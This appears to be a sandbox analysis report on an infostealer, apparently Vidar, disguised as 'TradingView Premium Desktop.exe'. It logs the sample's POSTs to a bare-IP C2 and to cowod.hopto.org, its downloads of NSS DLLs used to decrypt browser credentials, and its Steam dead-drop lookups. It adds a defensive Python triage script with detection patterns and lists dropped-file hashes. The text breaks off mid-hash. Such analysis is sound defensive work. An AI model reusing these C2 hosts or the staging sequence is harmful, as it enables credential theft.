                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.7kB
                                          6.4kB
                                          14
                                          10

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.4kB
                                          672 B
                                          9
                                          6

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          6.1kB
                                          605 B
                                          13
                                          7

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/sqlp.dll
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          101.8kB
                                          2.6MB
                                          1907
                                          1903

                                          HTTP Request

                                          GET https://49.12.197.9/sqlp.dll

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.5kB
                                          565 B
                                          9
                                          6

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
• 49.12.197.9:443 | https://49.12.197.9/ | tls, http | TradingView Premium Desktop.exe | 2.8kB sent / 525 B recv | 12 / 5 pkts
    POST https://49.12.197.9/ → 200
• 49.12.197.9:443 | https://49.12.197.9/freebl3.dll | tls, http | TradingView Premium Desktop.exe | 26.0kB sent / 707.5kB recv | 517 / 513 pkts
    GET https://49.12.197.9/freebl3.dll → 200
• 49.12.197.9:443 | https://49.12.197.9/mozglue.dll | tls, http | TradingView Premium Desktop.exe | 27.1kB sent / 627.9kB recv | 461 / 455 pkts
    GET https://49.12.197.9/mozglue.dll → 200
• 49.12.197.9:443 | https://49.12.197.9/msvcp140.dll | tls, http | TradingView Premium Desktop.exe | 16.7kB sent / 464.7kB recv | 342 / 338 pkts
    GET https://49.12.197.9/msvcp140.dll → 200
• 49.12.197.9:443 | https://49.12.197.9/softokn3.dll | tls, http | TradingView Premium Desktop.exe | 10.2kB sent / 267.4kB recv | 200 / 197 pkts
    GET https://49.12.197.9/softokn3.dll → 200
• 49.12.197.9:443 | https://49.12.197.9/vcruntime140.dll | tls, http | TradingView Premium Desktop.exe | 3.8kB sent / 84.0kB recv | 69 / 65 pkts
    GET https://49.12.197.9/vcruntime140.dll → 200
• 49.12.197.9:443 | https://49.12.197.9/nss3.dll | tls, http | TradingView Premium Desktop.exe | 70.8kB sent / 2.1MB recv | 1522 / 1519 pkts
    GET https://49.12.197.9/nss3.dll → 200
• 49.12.197.9:443 | https://49.12.197.9/ | tls, http | TradingView Premium Desktop.exe | 1.5kB sent / 2.8kB recv | 10 / 7 pkts
    POST https://49.12.197.9/ → 200
• 49.12.197.9:443 | https://49.12.197.9/ | tls, http | TradingView Premium Desktop.exe | 1.4kB sent / 748 B recv | 9 / 6 pkts
    POST https://49.12.197.9/ → 200
• 49.12.197.9:443 | - | tls | TradingView Premium Desktop.exe | 114.5kB sent / 2.0kB recv | 91 / 41 pkts
• 49.12.197.9:443 | - | tls | - | 1.4kB sent / 755 B recv | 9 / 6 pkts
• 49.12.197.9:443 | - | tls | - | 1.4kB sent / 518 B recv | 8 / 5 pkts
• 45.132.206.251:80 | http://cowod.hopto.org/ | http | - | 2.5kB sent / 132 B recv | 6 / 3 pkts
    POST http://cowod.hopto.org/ (no response recorded)
• 104.82.234.109:443 | steamcommunity.com | tls | - | 2.3kB sent / 43.0kB recv | 40 / 38 pkts
• 49.12.197.9:443 | - | tls | - | 1.0kB sent / 2.7kB recv | 11 / 8 pkts
• 49.12.197.9:443 | - | tls | - | 1.4kB sent / 622 B recv | 9 / 6 pkts
• 49.12.197.9:443 | - | tls | - | 1.5kB sent / 2.2kB recv | 10 / 7 pkts
• 49.12.197.9:443 | - | tls | - | 1.6kB sent / 6.4kB recv | 13 / 10 pkts
• 49.12.197.9:443 | - | tls | - | 1.4kB sent / 672 B recv | 9 / 6 pkts
• 49.12.197.9:443 | - | tls | - | 6.1kB sent / 525 B recv | 12 / 5 pkts
• 49.12.197.9:443 | - | tls | - | 85.2kB sent / 2.5MB recv | 1838 / 1830 pkts
• 104.124.170.33:443 | steamcommunity.com | tls | - | 2.3kB sent / 42.9kB recv | 39 / 37 pkts
• 49.12.197.9:443 | - | tls | - | 1.0kB sent / 2.7kB recv | 11 / 8 pkts
• 49.12.197.9:443 | - | tls | - | 1.4kB sent / 622 B recv | 9 / 6 pkts
• 49.12.197.9:443 | - | tls | - | 1.5kB sent / 2.2kB recv | 10 / 7 pkts
• 49.12.197.9:443 | - | tls | - | 1.6kB sent / 6.4kB recv | 13 / 10 pkts
• 49.12.197.9:443 | - | tls | - | 1.4kB sent / 712 B recv | 9 / 7 pkts
• 49.12.197.9:443 | - | tls | - | 6.1kB sent / 645 B recv | 13 / 8 pkts
• 49.12.197.9:443 | - | tls | - | 84.8kB sent / 2.5MB recv | 1830 / 1825 pkts
• 49.12.197.9:443 | - | tls | - | 1.5kB sent / 528 B recv | 8 / 5 pkts
• 104.18.38.233:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D | http | - | 779 B sent / 882 B recv | 6 / 4 pkts
    GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D → 200
    GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D → 200
• 104.18.38.233:80 | http://crl.usertrust.com/AddTrustExternalCARoot.crl | http | - | 328 B sent / 320 B recv | 4 / 3 pkts
    GET http://crl.usertrust.com/AddTrustExternalCARoot.crl → 404
• 104.82.234.109:443 | steamcommunity.com | tls | - | 2.3kB sent / 43.0kB recv | 40 / 38 pkts
• 49.12.197.9:443 | - | tls | - | 1.0kB sent / 2.7kB recv | 11 / 8 pkts
• 49.12.197.9:443 | - | tls | - | 1.4kB sent / 622 B recv | 9 / 6 pkts
• 49.12.197.9:443 | - | tls | - | 1.5kB sent / 2.2kB recv | 10 / 7 pkts
• 49.12.197.9:443 | - | tls | - | 1.6kB sent / 6.4kB recv | 13 / 10 pkts
• 49.12.197.9:443 | - | tls | - | 1.4kB sent / 672 B recv | 9 / 6 pkts
• 49.12.197.9:443 | - | tls | - | 6.1kB sent / 565 B recv | 13 / 6 pkts
• 49.12.197.9:443 | - | tls | - | 85.0kB sent / 2.5MB recv | 1835 / 1830 pkts
• 49.12.197.9:443 | - | tls | - | 1.5kB sent / 528 B recv | 8 / 5 pkts
• 8.8.8.8:53 | coincapy.com | dns | chrome.exe | 616 B sent / 1.2kB recv | 9 / 9 pkts
    coincapy.com → 172.67.154.80, 104.21.64.186
    10.169.217.172.in-addr.arpa → (no response recorded)
    67.169.217.172.in-addr.arpa → (no response recorded)
    crl.usertrust.com → 104.18.38.233, 172.64.149.23
    ocsp.comodoca.com → 104.18.38.233, 172.64.149.23
    ocsp.digicert.com → 192.229.221.95
    nexusrules.officeapps.live.com → 52.111.243.29
    251.206.132.45.in-addr.arpa → (no response recorded)
    172.214.232.199.in-addr.arpa → (no response recorded)
• 8.8.8.8:53 | 80.154.67.172.in-addr.arpa | dns | - | 544 B sent / 1.2kB recv | 8 / 8 pkts
    80.154.67.172.in-addr.arpa → (no response recorded)
    ctldl.windowsupdate.com → 199.232.210.172, 199.232.214.172
    172.210.232.199.in-addr.arpa → (no response recorded)
    crl.comodoca.com → 104.18.38.233, 172.64.149.23
    109.234.82.104.in-addr.arpa → (no response recorded)
    cowod.hopto.org → 45.132.206.251
    ctldl.windowsupdate.com → 199.232.214.172, 199.232.210.172
    steamcommunity.com → 104.82.234.109
• 224.0.0.251:5353 | - | - | chrome.exe | 204 B sent | 3 pkts
• 8.8.8.8:53 | steamcommunity.com | dns | TradingView Premium Desktop.exe | 201 B sent / 299 B recv | 3 / 3 pkts
    steamcommunity.com → 104.124.170.33
    33.170.124.104.in-addr.arpa → (no response recorded)
    steamcommunity.com → 104.82.234.109
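Read together, the connections above show the staging sequence Vidar is known for, and the extracted configuration (the steamcommunity.com profile and t.me channel listed under C2) points the same way: the sample POSTs to a bare-IP C2 over TLS, fetches the Mozilla NSS libraries (freebl3, mozglue, softokn3, nss3) and the MSVC runtime they import (msvcp140, vcruntime140) from that same IP so it can decrypt Firefox-family credential stores, POSTs again, and opens TLS sessions to steamcommunity.com, whose profile page serves as a dead-drop resolver for the live C2 address; the one plaintext POST to cowod.hopto.org stands out as well, and mozglue.dll and nss3.dll reappear under C:\ProgramData in the dropped-file list. The Python below is an added example, not part of the sandbox report or of any tool it uses: it parses a pipe-delimited connection log that mirrors the report's field order and returns a verdict with the evidence behind it. The log layout, the minimum-DLL threshold, the dead-drop host list and the regular expression for a random upper-case working directory under C:\ProgramData are assumptions of the example; the sample log and dropped-file list are constructed from the values on this page.

```python
"""Triage a sandbox connection list for Vidar-style C2 staging (added example)."""
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict, namedtuple
from urllib.parse import urlsplit

# Libraries the stealer fetches from its C2: Mozilla NSS plus the MSVC runtime it imports.
NSS_STAGE_DLLS = {"freebl3.dll", "mozglue.dll", "softokn3.dll", "nss3.dll",
                  "msvcp140.dll", "vcruntime140.dll"}
# Profile pages listed under "C2" in the extracted config (dead-drop resolvers).
DEAD_DROP_HOSTS = {"steamcommunity.com", "t.me"}
# Assumption: a random upper-case working directory under C:\ProgramData,
# as in C:\ProgramData\FBGIDHCAAKEB\FHDHCA from the dropped-file list.
VIDAR_WORKDIR = re.compile(r"^C:\\ProgramData\\[A-Z]{8,}(\\[A-Z]{4,})?$")

# Constructed log, fields in the report's order: dst | URL or host | protocols |
# process | HTTP method | status. The pipe layout is this example's assumption.
SAMPLE_LOG = """\
49.12.197.9:443|https://49.12.197.9/|tls, http|TradingView Premium Desktop.exe|POST|200
49.12.197.9:443|https://49.12.197.9/freebl3.dll|tls, http|TradingView Premium Desktop.exe|GET|200
49.12.197.9:443|https://49.12.197.9/mozglue.dll|tls, http|TradingView Premium Desktop.exe|GET|200
49.12.197.9:443|https://49.12.197.9/msvcp140.dll|tls, http|TradingView Premium Desktop.exe|GET|200
49.12.197.9:443|https://49.12.197.9/softokn3.dll|tls, http|TradingView Premium Desktop.exe|GET|200
49.12.197.9:443|https://49.12.197.9/vcruntime140.dll|tls, http|TradingView Premium Desktop.exe|GET|200
49.12.197.9:443|https://49.12.197.9/nss3.dll|tls, http|TradingView Premium Desktop.exe|GET|200
49.12.197.9:443|https://49.12.197.9/|tls, http|TradingView Premium Desktop.exe|POST|200
45.132.206.251:80|http://cowod.hopto.org/|http||POST|
104.82.234.109:443|steamcommunity.com|tls|||
8.8.8.8:53|coincapy.com|dns|chrome.exe||
8.8.8.8:53|steamcommunity.com|dns|TradingView Premium Desktop.exe||
"""
# Constructed from the "Downloads" list in the report.
SAMPLE_DROPPED = [r"C:\ProgramData\FBGIDHCAAKEB\FHDHCA", r"C:\ProgramData\mozglue.dll",
                  r"C:\ProgramData\nss3.dll",
                  r"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History"]

Conn = namedtuple("Conn", "dst url proto process method status")


def parse_log(text: str) -> list[Conn]:
    conns = []
    for line in text.splitlines():
        if line.strip():
            dst, url, proto, proc, method, status = (f.strip() for f in line.split("|"))
            conns.append(Conn(dst, url, proto, proc, method, int(status) if status else None))
    return conns


def host_of(url: str) -> str:
    """Hostname of a URL, or the bare host name the log shows."""
    return (urlsplit(url).hostname or "") if "://" in url else url


def is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_nss_staging(conns: list[Conn], min_dlls: int = 4) -> dict[str, list[str]]:
    """Bare-IP hosts that served >= min_dlls of the NSS set and also took a POST."""
    served: dict[str, set[str]] = defaultdict(set)
    posted: set[str] = set()
    for c in conns:
        host = host_of(c.url)
        if not is_ip(host):
            continue
        if c.method == "POST":
            posted.add(host)
        elif c.method == "GET":
            name = urlsplit(c.url).path.rsplit("/", 1)[-1].lower()
            if name in NSS_STAGE_DLLS:
                served[host].add(name)
    return {h: sorted(d) for h, d in served.items() if len(d) >= min_dlls and h in posted}


def find_dead_drops(conns: list[Conn]) -> list[tuple[str, str]]:
    """(host, process) pairs that touched a dead-drop site; process may be empty."""
    return sorted({(host_of(c.url), c.process) for c in conns if host_of(c.url) in DEAD_DROP_HOSTS})


def flag_dropped(paths: list[str]) -> list[str]:
    """NSS DLLs written under C:\\ProgramData, or a Vidar-style working directory."""
    return [p for p in paths
            if (p.rsplit("\\", 1)[-1].lower() in NSS_STAGE_DLLS
                and p.lower().startswith("c:\\programdata\\"))
            or VIDAR_WORKDIR.match(p)]


def triage(log_text: str, dropped: list[str]) -> dict:
    """Combine network and file evidence into one verdict with its reasons."""
    conns = parse_log(log_text)
    report = {
        "nss_c2": find_nss_staging(conns),
        "dead_drops": find_dead_drops(conns),
        "plaintext_posts": sorted({c.url for c in conns if c.method == "POST" and c.url.startswith("http://")}),
        "dropped_hits": flag_dropped(dropped),
    }
    staged, corroborated = report["nss_c2"], report["dead_drops"] or report["dropped_hits"]
    report["verdict"] = "vidar-like" if staged and corroborated else "inconclusive"
    return report


if __name__ == "__main__":
    print(triage(SAMPLE_LOG, SAMPLE_DROPPED))
```

Run it as a script to print the report for the constructed sample; in a pipeline, feed it flow records with the same six fields. Requiring at least four of the six DLLs keeps a single stray GET for nss3.dll from firing, and requiring a POST to the same bare IP ties the download to a check-in rather than to a file mirror; a dead-drop contact or an NSS DLL under C:\ProgramData is then enough corroboration to call the pattern.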

                                        MITRE ATT&CK Enterprise v15


                                        Downloads

• C:\ProgramData\FBGIDHCAAKEB\FHDHCA (20KB)
    MD5    a603e09d617fea7517059b4924b1df93
    SHA1   31d66e1496e0229c6a312f8be05da3f813b3fa9e
    SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
    SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

• C:\ProgramData\mozglue.dll (593KB)
    MD5    c8fd9be83bc728cc04beffafc2907fe9
    SHA1   95ab9f701e0024cedfbd312bcfe4e726744c4f2e
    SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
    SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

• C:\ProgramData\nss3.dll (2.0MB)
    MD5    1cc453cdf74f31e4d913ff9c10acdde2
    SHA1   6e85eae544d6e965f15fa5c39700fa7202f3aafe
    SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
    SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619 (471B)
    MD5    0b6ac06c568d0a743dcf20ad3d86a9b5
    SHA1   2eda48e503cc99c4d203f082c2a01681d5bebab7
    SHA256 4161338d23c80d33e4c78af8a50a990e30e7bd8d983c3a7c6a8e4a8724ab9a8e
    SHA512 7967aa9aea2de28508dfaae76bc5c4d4c9b28df183107d8c2910eb4d5d68227db6ef9fe98b313004114358334758f91d48604f52970ffd6d747c125563e88d64

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619 (400B)
    MD5    46c34c9897f44276c28b0b754289f693
    SHA1   6e8c3ab999183775ff4452bc545f1643deecfcc3
    SHA256 19a5fce0b3697575266d0efa8106823478ead242212c500cc110a858d4e4b019
    SHA512 f42979c68a4185f2d8b6ddaa1eeda14781691e1d0ec96c3a6d473c4937509797913044ed058c829aa4947259be8eb69cfdb8ee011a31b72395083c7fcdc8f437

• C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx (64KB)
    MD5    b5ad5caaaee00cb8cf445427975ae66c
    SHA1   dcde6527290a326e048f9c3a85280d3fa71e1e22
    SHA256 b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8
    SHA512 92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

• C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock (4B)
    MD5    f49655f856acb8884cc0ace29216f511
    SHA1   cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
    SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
    SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

• C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val (1008B)
    MD5    d222b77a61527f2c177b0869e7babc24
    SHA1   3f23acb984307a4aeba41ebbb70439c97ad1f268
    SHA256 80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747
    SHA512 d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState (649B)
    MD5    462620793e465b694e17972f822068d4
    SHA1   ed8ac78e1a482cc6bb89326582f90c3a99b678d1
    SHA256 3f3adc2501e5fd4c255ce227985a1601fbaeca6536b6981e8e5a7bb73fd144fb
    SHA512 dd59a6317adf0a6da83ec8c9a6565d2ecdea0411acf25544370c5e4101250d7dff76ceaf410ee9111b3859f76d3c58e442414994c6dadec5c6132ad072b3b03d

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0 (44KB)
    MD5    bbb90e096e10b48e78616dc191dd9b1d
    SHA1   2d8f8ecdb8b723b85e49d390601af142e22b4f37
    SHA256 0a3f472b3bc482d7526c4963ec04595d2869d18c78651eed825efcf74cab490d
    SHA512 85f101fabca0a8dd103751329f005195574a808677aad1a96ad5cc32762ac310d3eb203d2a78f1ad5d564a53ddf6608beece75dc8e61c4d097895790b2f360df

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1 (264KB)
    MD5    fb1e1e0eac54bfe995b0486ac8e66e5e
    SHA1   c5d0cc62b7fa85c457bde97036e075affdcef49b
    SHA256 87f2f3dedf620866a395720c36167547aa7f6608473c2148da86305885d1ef8c
    SHA512 e549083593c41c5a007f110e93d6f09dbfb4ee3bb78ed80ed9b60a6aa48f7dfff6011ac39ee11d974b26fcfa9b2d5ecd4e7323b3bce9da8a94747ba8b8e8e694

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History (160KB)
    MD5    7949a6f10f8a75934aaa419a61554beb
    SHA1   35160e5fc43bf3531291f919d624421e91f4304a
    SHA256 1f029a024345bac16f367432f933d595496353be30928bfbc795704ab17a11c5
    SHA512 8f558240e6b203fd441d9e89945a7be2b8c260d41bbf3b3672d56d7a3c2e00fc2f4fe3a9c1d8a22c3f7994371cf622901c4727f945978d80ec1369b0aee60eca

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State (1KB)
    MD5    b9fe0774e24aa1cd6a1392139e91e6e8
    SHA1   66dcd4aae5d17bdbebb8698716c2e430163e2d6c
    SHA256 76365547e4f294c5d04f93655b43c4510150c6f68f62af287fd07a4e10f18adf
    SHA512 5879f4b2e755f0aff52cc44d80f0a4ab2a6a16cc5e01714170d1a737714cd22bb9921a3fe09219ca9adb5424bd53142b4c150932af17ea6af180f55197b56d38

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State (1KB)
    MD5    3ad2114ed1e73297e20ad5ef27424c3f
    SHA1   aa4c2f8cff4a72634d5a256e84121cdfdc602630
    SHA256 9e845c0f6e86c64dd15189ae38745acb4d3bc21d7a93a24ed14a14521f5e5d69
    SHA512 e31b6c6237ace25fa6fc378600d694cdfbaa12b9627060df11c33f45eee8d4933ae381d8e56d293536bcf5f9b007cbee593ac84ea90f7a0004e7e272532aa66b

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL (36KB)
    MD5    b0141409232dbc4e25df790d0c17adb3
    SHA1   dd15446b202363c65be1f43ada625ca162c390fa
    SHA256 eecac302c87c38fc719a34cb4d9d1af31648c0496578747b1617a0e7617f7183
    SHA512 2e6eecf64db20e2951776f252f560af423c6284f8473cc9e1f7ad1ddd60b74fe9157d69ed24c936ab4535eee203490f02517db2eb922e3c745adb7a53406cc0f

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                          Filesize

                                          2B

                                          MD5

                                          d751713988987e9331980363e24189ce

                                          SHA1

                                          97d170e1550eee4afc0af065b78cda302a97674c

                                          SHA256

                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                          SHA512

                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          3827eb1e0612f922ced7aa29ade6813a

                                          SHA1

                                          fc7836d7b42830719f0c7e9d1ff3b284db10fc9a

                                          SHA256

                                          22a8c6b4f7f60cd9865e2a56ac82709acaee0908a5f062ba54edf6f998524f28

                                          SHA512

                                          8c64733812e532a550800b18bda0886f056819201b6ad819f7f83f3d61f32935ee62e5dde2b51a956e603e614710fcb6b22ac71a058d7149920ef1eb82e7c9c5

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          7516b425c12f108de486acadfb66c61b

                                          SHA1

                                          dce780f9df0249928e021aa67dc366b2b43ef11a

                                          SHA256

                                          c3706d8916b7df396320cd8a5430ea778e0018464345e52a1af20751c84b5882

                                          SHA512

                                          a67a655d18345e804c008d0beb7c2338546c72b2847530cf70b5d29377fb797f799906e2e92db7093d5bdbb2f343cf16e77b52f04897cff022374e7f5cbc6235

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          bd5b8f6d649865bde43fa968e4f13e48

                                          SHA1

                                          1b772fe5226cb4af4be0401a0d764fae4951b32e

                                          SHA256

                                          89701f0c4e0c2238518a8c72273db9b02ea76dbbd3b09510db2488a2acdd16b5

                                          SHA512

                                          d1adcedb342f1e3c9949d95b9be538d8c3dce389159b392e84a6714d8727b402171b96a7d64665feb15d07b1825d2de28de07202d98ad0a5355da06ccccff5cf

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          b0700cfad9afbfec2fe1b81760ee444d

                                          SHA1

                                          bde1669db91e9ef828140c5afade1d30ebcd4125

                                          SHA256

                                          0f4e292ebecb7da12fc08dd6a049ae26d906857dfd2ed5aadf3a6710ff513a85

                                          SHA512

                                          30e4b30d52ed917cc6e1a101a4512a6c8d5c4f46ae92cff65a7ae6b31b3b861cf936ad8ce8406491e617975b26cb178fc8cab2c0a63c9f68991797ed47c8b598

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          9519016410af673ad405b29767680c7a

                                          SHA1

                                          e5fe7957a587efe69f64455dbd02a26b8039d46b

                                          SHA256

                                          fdd3e130874215ff2fe8526f669117facd5542e6be1adbb9e3669abb4f4f3817

                                          SHA512

                                          6f81189cfbe7bd5a1659e4032d8d5c606ed62cb50d5438ccf0f0b6bdaf3bde2a5454942fe0c1ba0f72e64fecae65511f87eeb7258fdaac8185e87754344210ae

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          2a05e6913468e280b6b388a717575791

                                          SHA1

                                          13648bfa912658f3296b680e861fbc76cfd94525

                                          SHA256

                                          e9c80068162e13e8b0847d1d45b9469604268b08b376c35a2fe914403bf7267e

                                          SHA512

                                          a78577554f16cd1d441ccb3e276eecb3b55846b678a7a869a531505c4d434c102301dca4a6888b8930853f2a0e43ac9609da7e268bad6a76e453a63dd19d4882

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          f97ccfdc8f12bcf78d0c0b9521587a28

                                          SHA1

                                          a725b3d759348931985e1312980885ebacabc4fd

                                          SHA256

                                          aa0c832b142ea4d8c8bf76621496ff2cfc9e18f3395664bafaf4f5c02049c07c

                                          SHA512

                                          3d36fffc1a71eb3e418a78367e6da295f8fc5dd4527d31f0119a706206366dfe72c1e99c73615b01e56f56ebfe6df83b3786aed84f27a06eff90ca009886266e

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          5070a8687c5e19e84ff1a0ec22373c83

                                          SHA1

                                          7d4e7b8b54bb0fdc4766b50ea718ff24b5438260

                                          SHA256

                                          a6ffcba9c4ce57fcec840404c54195d8c180da038bcf385e7e650944c120fae0

                                          SHA512

                                          fd1b7ce8d16e53f8aba47b5a9ded29909f5dbb296a97b1bbd84e366e4642641d9bde0f97d4572a13fe726f27f2b8651bd1170ca5ba7562857947bee1ebe8fd2f

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          ef213c896c59ca9308c7c3396b131a54

                                          SHA1

                                          474769f96d285339ee03cea6225ffcb7bc941657

                                          SHA256

                                          3cbbd910a0de5d0a2544aa499fad9768745188e8eca0f55bcf3ca4a00315b638

                                          SHA512

                                          62699d20e7ac22d1d4ec35644114d84b399d1341e679f2a1ecd51a2f28c6939c1dcd78fc743ac3bcfee62a48b634728126b48434e567e3118c20881092bf8eb3

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          25d7bfd026f627524eabe0baabbedf8e

                                          SHA1

                                          231f37a66d7fd0b3fcd8ada364043e8569c40406

                                          SHA256

                                          487d67a1f96b1feae0e073adb2335af2ab14e7123421ee44d71cc764db7c2bab

                                          SHA512

                                          c78a9269c373f4e7b351ee2a02e902a7ed2b1e3e3212415d839d532592c9364fc93acec1a4ded866d35efeb4d93f2d91bb12e118212ca0a7e946dd7349423fbf

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          533007b0089083cfe4c3d0751e6049e8

                                          SHA1

                                          9af9315d7fcaa59f0af873c191d08b9e1f9159c2

                                          SHA256

                                          fb3a2dbcf523038651e99b82b8f285ffd6b74207616fcbb57ed949e199480818

                                          SHA512

                                          3fe2ef7cf94cd1339393a8f40e8f8e6c7470ca2dc2af0297fe6a2819cb12bcc5869f8f1e269b8ff37c528011d3faff5fb053f3be4c263ec0f71ff89c93b85bc5

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          91f807b632d721191ded5bc6e73a872a

                                          SHA1

                                          5ffb0efab321ce0b921cdc153d15b7d703a0a512

                                          SHA256

                                          fb2ef0c035e80b43ce759543535bb57f163007196586b92d83861b5629620a17

                                          SHA512

                                          a2d93c44cb6809f690aefe876cd0e843c61ae7eeb89429466caf9ed34a664e24655f19f5d16061443d4732054dc95b486d67b8eba021ebfb0f8363e1caaef8fe

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          cec92e94abc7ad6597f3ac525439e298

                                          SHA1

                                          335204ac916b12ada9ab82980625fb0fba27d950

                                          SHA256

                                          78f9a1b04350b313eab0e49d994a67b7647c6a120169b95a914bf95897467b24

                                          SHA512

                                          aa5f34ad1dd55b89405a8880ca0de09cdf56676de891bf75abadd0d96b8a4a9c5a0d1f10c9c0df30112aa03d8c194ab5f0cf9c734fa3965c6e953721a1373346

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          4ffa01abffefb0411e175a7447d7ca0f

                                          SHA1

                                          aa1b295c5cd9d3ddd93d2ff4e61f07cd1318bc00

                                          SHA256

                                          23bf49c9c2d0739e67cd717913921eef67e90e7d65b4cd754aab494288143d46

